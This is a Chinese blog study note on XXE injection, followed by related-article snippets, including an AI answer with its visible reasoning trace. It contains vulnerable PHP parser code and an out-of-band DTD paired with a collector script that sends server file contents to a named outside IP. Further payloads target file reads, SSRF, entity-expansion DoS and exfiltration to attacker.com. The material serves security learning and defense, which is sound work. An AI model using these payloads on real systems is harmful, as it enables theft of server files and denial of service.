xxe

最新推荐文章于 2024-03-30 20:32:16 发布
最新推荐文章于 2024-03-30 20:32:16 发布
阅读量488 收藏 7
点赞数 1
分类专栏: web安全学习 文章标签: xxe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40491569/article/details/84593401
版权

1.如何甄别可能存在xxe

最直接的回答就是: 甄别那些接受XML作为输入内容的端点。 但是有时候,这些端点可能并不是那么明显(比如,一些仅使用JSON去访问服务的客户端)。

在这种情况下,渗透测试人员就必须尝试不同的测试方式,比如修改HTTP的请求方法,修改Content-Type头部字段等等方法,然后看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。

2.xxe 是通过实体引用,并且对用户输入过滤不严引起的,漏洞复现是注意libxml2.9.0版本后默认不解析entity的

$xml = file_get_contents("php://input");
$data = simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
print_r($data);
//第三个参数LIBXML_NOENT,否则不解析实体
//利用reflection类实例化SimpleXMLElement类,SimpleXMLElement的构造方法
$xmlclass=new ReflectionClass("SimpleXMLElement");
$a = file_get_contents("php://input");
$instancexmlclass= $xmlclass->newInstance($a,LIBXML_NOENT);
echo "<pre>";
print_r($instancexmlclass);
echo "</pre>";
//同样第二个参数LIBXML_NOENT,否则不解析

 

//利用SimpleXMLElement触发xxe
$a = file_get_contents("php://input");
$c=new SimpleXMLElement($a,LIBXML_NOENT);
//print_r($c);

 

漏洞利用方向

1.读取任意文件

读取文件有两种形式,有回显和无回显,

有回显,直接构造恶意代码

无回显,利用外部通道

放在远程服务器上的1.php

<?php
file_put_contents("1.txt",$_GET['file']);
?>

放在远程服务器的xxe.xml

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://123.207.51.206:88/xh/1.php?file=%file;'>">
%all;

2.dos攻击

结果报错,其他触发xxe的方式也无法进行dos攻击

3.探测内网端口

上图说明端口开放

4.命令执行(expect)

这个需要按expect扩展(php默认是没有这个扩展的),此类利用较少

------------------------------------------------------------------------------------------------------

3.默认协议

PHP扩展协议

一道ctf题

http://web.jarvisoj.com:9882/ 

XXE(外部实体注入攻击)
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
xxe讲解
2401_86405377的博客
03-11 1667
(2)盲注xxe,原理:攻击者无法直接看到文件内容或请求结果(无回显),但可以通过其他方式间接获取数据。(5)拒绝服务攻击(dos xxe),原理:通过构造恶意实体耗尽服务器资源(如内存、CPU),导致服务崩溃。(1)经典xxe,原理:直接通过外部实体读取服务器本地文件或访问远程资源。(与sql的回显差不多)(3)基于错误的xxe,原理:通过触发XML解析错误,让服务器在错误信息中返回敏感数据。(7)远程代码执行,原理:结合其他漏洞(如PHP的。(4)实数实体注入,原理:利用DTD中的。
XXE
qfslyy的博客
01-07 215
直接对服务器进行攻击的手段,XML外部(DTD)实体注入(XML文档,一种标签语言,作用是将数据,运行部分程序,对象,转换为xml格式存放,在别处调用时继续使用。有漏洞,可以写xml格式恶意代码让服务器执行。) 怎么发现xxe: 在xxe-lab举例 使用xml文档时,使用恶意xml文档。 <?xml version="1.0" encoding="UTF-8"?> %aaa; ]> 抓包,增加以上代码,http地址协商dnslog。cn的地址 然年forward,刷新dnslog xx
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
【Java CTF夺旗:反编译、XXE与反序列化详解】 在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXE(XML External Entity)攻击、反序列化...
XXE(1)
1stPeak's Blog
04-06 377
XXE简介 XXE:全称XML External Entity Injection,即XML外部实体注入漏洞 知识点 1、XML 2、DTD,这个是最重要的 简介: (1)内部的 DOCTYPE 声明 假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中: <!DOCTYPE 根元素 [元素声明]> 例如: <!DOCTYPE no...
XXE以及实例
doubirui的博客
03-30 1249
其中最常见的一种攻击是利用DTD(Document Type Definition)来读取本地文件,通过将file://协议和可访问的文件路径嵌入到XML中,攻击者可以读取服务器上的敏感文件内容。在 XML 中,CDATA 块是一种特殊的文本块,用于包含任意文本数据,包括标签和特殊字符,而不需要进行转义处理。总结起来,使用 % 的形式是参数实体引用的一种特殊用法,用于引用其他实体。需要注意的是,对于一般的实体引用,如 % 或 %,可以在 XML 文档中的任何位置使用,而不仅限于参数实体引用的定义中。
XXE(xml外部实体攻击)
HoYim
04-11 4547
1、概念 XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
XXE总结
weixin_43940853的博客
03-03 285
XXE 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 我们在本地测试xxe https://github.com/c0ny1/...
xxe漏洞的学习与利用总结
weixin_30701575的博客
07-29 2400
前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识。 xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括...
XXE详解
qq_48904485的博客
03-22 5648
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
Xxe
最新发布
03-30
<think>嗯,用户之前问过XSS,现在又问了XXE。这说明他们对网络安全相关的漏洞比较感兴趣,可能是在学习这方面的知识,或者工作中遇到了相关的问题。我需要先确认XXE的定义,然后回想常见的攻击类型、危害以及防御措施。 首先,XXE的全称是XML External Entity,也就是XML外部实体攻击。它和XSS不同,XSS主要针对的是跨站脚本,而XXE则是利用了XML解析器的特性来实施攻击。用户可能想知道XXE的基本概念,所以得先给出一个明确的定义。 接下来,攻击类型方面,XXE主要有几种形式,比如读取本地文件、发起SSRF攻击、拒绝服务攻击,还有盲注XXE。这些都需要详细解释,特别是通过示例让用户更容易理解。比如,读取/etc/passwd文件的例子,用户可能对如何构造这样的XML payload感兴趣。 然后要讲危害,比如数据泄露、服务中断、内网探测等。这部分需要和前面的攻击类型对应起来,说明每种攻击可能导致的后果。用户可能关心这些漏洞的实际影响,以便评估风险。 防御措施方面,禁用外部实体是最关键的,同时还有输入验证、使用安全配置的解析器、限制XML结构等。需要具体说明如何实施这些措施,比如在Java中如何设置DocumentBuilderFactory的属性,或者在PHP中如何使用libxml_disable_entity_loader。用户可能需要实际的代码示例来参考,这样他们可以在自己的项目中应用。 另外,用户之前询问的是XSS,现在转向XXE,可能是在构建一个安全的Web应用,需要全面了解各种漏洞。因此,回答中要强调两者的不同,以及防御策略的差异。比如,XSS主要涉及输入输出过滤和CSP,而XXE则更多涉及XML解析的配置。 可能用户还不太清楚XML解析的具体过程,所以需要简单说明XML外部实体的概念,以及为什么解析器默认处理这些实体会有安全隐患。这样可以帮助他们理解漏洞的根源。 需要确保回答结构清晰,分点列出,每个部分有足够的细节但不过于冗长。用户可能需要快速找到关键信息,比如如何防御,因此防御措施部分要重点突出,并且给出具体的方法和代码示例,这样更实用。 还要注意检技术细节的准确性,比如PHP的函数是否正确,Java的配置是否最新。避免过时的方法,比如旧的PHP版本处理XXE的方式可能和新版不同,需要指出版本差异或者建议使用最新安全实践。 最后,总结部分要强调XXE的严重性和防御的必要性,提醒用户在实际开发中注意XML处理的安全配置,结合其他安全措施。这样用户能有一个全面的认识,并知道如何采取行动来保护他们的应用。</think>### XXE(XML 外部实体攻击)介绍 #### 1. **定义** XXE(XML External Entity,XML 外部实体攻击)是一种利用 XML 解析器漏洞的安全攻击。攻击者通过注入恶意 XML 外部实体,读取服务器本地文件、发起网络请求或执行拒绝服务攻击(DoS)。其核心是滥用 XML 规范中定义的“外部实体”功能。 --- #### 2. **攻击原理** XML 允许通过 `<!ENTITY>` 定义实体(如变量),而外部实体可以通过 URL 或文件路径引用外部资源。若 XML 解析器未禁用外部实体解析,攻击者可构造恶意 XML 内容,例如: ```xml <!DOCTYPE payload [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> ``` 当解析此 XML 时,服务器会读取 `/etc/passwd` 文件内容并返回给攻击者。 --- #### 3. **常见攻击类型** - **读取本地文件** - **示例**:通过 `file://` 协议读取敏感文件(如 `/etc/passwd`、`C:\Windows\system.ini`)。 - **Payload**: ```xml <!ENTITY xxe SYSTEM "file:///etc/passwd"> ``` - **服务端请求伪造(SSRF)** - **示例**:利用外部实体访问内网服务(如 `http://internal-api:8080`)。 - **Payload**: ```xml <!ENTITY xxe SYSTEM "http://192.168.1.1/admin"> ``` - **拒绝服务攻击(DoS)** - **示例**:通过“实体膨胀”耗尽服务器资源(如 Billion Laughs 攻击): ```xml <!DOCTYPE payload [ <!ENTITY a "lol"> <!ENTITY b "&a;&a;&a;&a;&a;"> <!ENTITY c "&b;&b;&b;&b;&b;"> <!-- 重复定义直至内存耗尽 --> ]> <data>&c;</data> ``` - **盲注 XXE** - **原理**:通过外带数据(Out-of-Band)将文件内容发送到攻击者服务器。 - **Payload**: ```xml <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%xxe;'>"> %exfil; ``` --- #### 4. **危害** - **敏感数据泄露**:读取服务器配置文件、数据库凭证等。 - **内网探测**:扫描内网服务或 API。 - **服务瘫痪**:通过 DoS 攻击导致系统崩溃。 - **远程代码执行(RCE)**:结合其他漏洞(如 PHP Expect 模块)执行命令。 --- #### 5. **防御措施** - **禁用外部实体解析** - **Java**:设置 `DocumentBuilderFactory` 禁用外部实体: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); ``` - **PHP**:使用 `libxml_disable_entity_loader(true);`。 - **输入验证与过滤** - 检 XML 内容是否包含 `<!DOCTYPE>` 或 `<!ENTITY>` 声明。 - 使用白名单限制 XML 中允许的标签和属性。 - **使用安全配置的 XML 解析器** - 优先选择默认禁用外部实体的解析库(如 Python 的 `defusedxml`)。 - 避免直接使用 `XMLReader` 或 `SAXParser` 的默认配置。 - **限制 XML 结构复杂度** - 禁止 DTD(文档类型定义)或限制实体层级深度。 - **监控与日志审计** - 记录异常的 XML 解析请求,分析潜在攻击行为。 --- #### 6. **总结** XXE 是 XML 解析场景中的高危漏洞,防御需从禁用外部实体、严格过滤输入、选择安全解析器三方面入手。开发中应避免信任用户提交的 XML 数据,并定期更新依赖库以修复已知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值